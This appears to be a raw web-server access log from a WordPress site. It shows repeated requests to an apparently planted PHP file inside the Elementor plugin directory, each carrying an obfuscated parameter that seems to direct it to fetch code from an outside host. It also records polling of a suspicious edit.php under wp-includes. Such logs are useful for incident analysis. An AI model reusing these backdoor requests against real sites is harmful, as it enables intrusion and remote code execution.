179.188.53.243 - - [16/Mar/2026:02:34:19 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333634323835392p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633393235392q3331313739363634343130623631303462646661666462623464653330663062222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [16/Mar/2026:02:34:40 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333634323838302p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633393238302q3462386435313832633733316238333136343663393239636138303437666431222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [16/Mar/2026:02:35:01 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333634323930312p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633393330312q3138613039613665626339366239626335613833656663646139633235653237222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [16/Mar/2026:02:35:22 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333634323932322p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633393332322q6230313131336138663130343339346365376362663465386132666565303534222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [16/Mar/2026:02:35:47 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333634323934372p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633393334372q6537646332653862383931623538376164383439636461633062363331363931222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
69.197.179.242 - - [16/Mar/2026:02:39:20 -0300] "GET /wp-includes/imddc187/edit.php?id=212809 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-includes/imddc187/edit.php?id=212809" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
179.188.53.243 - - [16/Mar/2026:02:36:08 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333634323936382p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633393336382q6636653832336163316130653762363639323638336163626137383237646534222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [16/Mar/2026:02:36:29 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333634323938392p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633393338392q3764373739663662336134613639656662313130386133633664343464643230222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [16/Mar/2026:02:36:52 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333634333031322p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633393431322q6564323961633563326537313430366166353034396333666261656464633339222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [16/Mar/2026:02:37:13 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333634333033332p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633393433332q6639643466306539316536336635636233616330343965343932333330316633222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
69.197.179.242 - - [16/Mar/2026:02:40:53 -0300] "GET /wp-includes/imddc187/edit.php?id=212809 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-includes/imddc187/edit.php?id=212809" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
179.188.53.243 - - [16/Mar/2026:02:37:34 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333634333035342p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633393435342q6164366334663130653866303834323662626263353033653366316134343737222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [16/Mar/2026:02:37:55 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333634333037352p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633393437352q3032373063613632313034383739393236643961386130366339656132626136222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [16/Mar/2026:02:38:16 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333634333039362p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633393439362q6264323430323363633235613161313335343030643162613365373066653832222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [16/Mar/2026:02:38:37 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333634333131372p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633393531372q3861616363323564323438616438343566633536643766623639316464343132222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
69.197.179.242 - - [16/Mar/2026:02:42:26 -0300] "GET /wp-includes/imddc187/edit.php?id=212809 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-includes/imddc187/edit.php?id=212809" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
179.188.53.243 - - [16/Mar/2026:02:38:58 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333634333133382p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633393533382q6631626565656563316136633133393263386434616661343036346536396436222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
74.7.228.16 - - [16/Mar/2026:02:44:02 -0300] "GET /robots.txt HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
179.188.53.243 - - [16/Mar/2026:02:39:19 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333634333135392p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633393535392q3030316437633438326136333035303565333863376339646133613264623932222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
74.7.244.31 - - [16/Mar/2026:02:44:38 -0300] "GET /robots.txt HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
179.188.53.243 - - [16/Mar/2026:02:39:40 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333634333138302p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633393538302q3166633466626338616532643165633264343934623466643932363335363064222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [16/Mar/2026:02:40:01 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333634333230312p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633393630312q6133633466666230323637336635313065633433336262383434373737666335222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [16/Mar/2026:02:40:22 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333634333232322p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633393632322q3530633132616638303661386632366566313263363664633532323139393265222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
69.197.179.242 - - [16/Mar/2026:02:44:00 -0300] "GET /wp-includes/imddc187/edit.php?id=212809 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-includes/imddc187/edit.php?id=212809" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
179.188.53.243 - - [16/Mar/2026:02:40:45 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333634333234352p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633393634352q6363396535373362353036306663613536653531646238333131323635643266222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [16/Mar/2026:02:41:10 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333634333237302p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633393637302q3737616431663636343139613230363236616131323366343538363061363135222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [16/Mar/2026:02:41:31 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333634333239312p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633393639312q3333613562383333653335343738613166363232663132343632333136386532222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [16/Mar/2026:02:41:53 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333634333331332p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633393731332q3732666433633339336262646462653238313634343131376439623862396365222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
69.197.179.242 - - [16/Mar/2026:02:45:31 -0300] "GET /wp-includes/imddc187/edit.php?id=212809 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-includes/imddc187/edit.php?id=212809" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
179.188.53.243 - - [16/Mar/2026:02:42:15 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333634333333352p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633393733352q3237666635393264643637643330356463346164306132363034636438316361222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [16/Mar/2026:02:42:36 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333634333335362p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633393735362q6637656665663164633563326366313731383630376133303337396461663361222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [16/Mar/2026:02:42:57 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333634333337372p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633393737372q3661643537386536633062363438376138356130333031303431613864656638222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [16/Mar/2026:02:43:18 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333634333339382p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633393739382q6431643835383764653764616639353632303730393433326462396632373637222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
69.197.179.242 - - [16/Mar/2026:02:47:03 -0300] "GET /wp-includes/imddc187/edit.php?id=212809 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-includes/imddc187/edit.php?id=212809" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
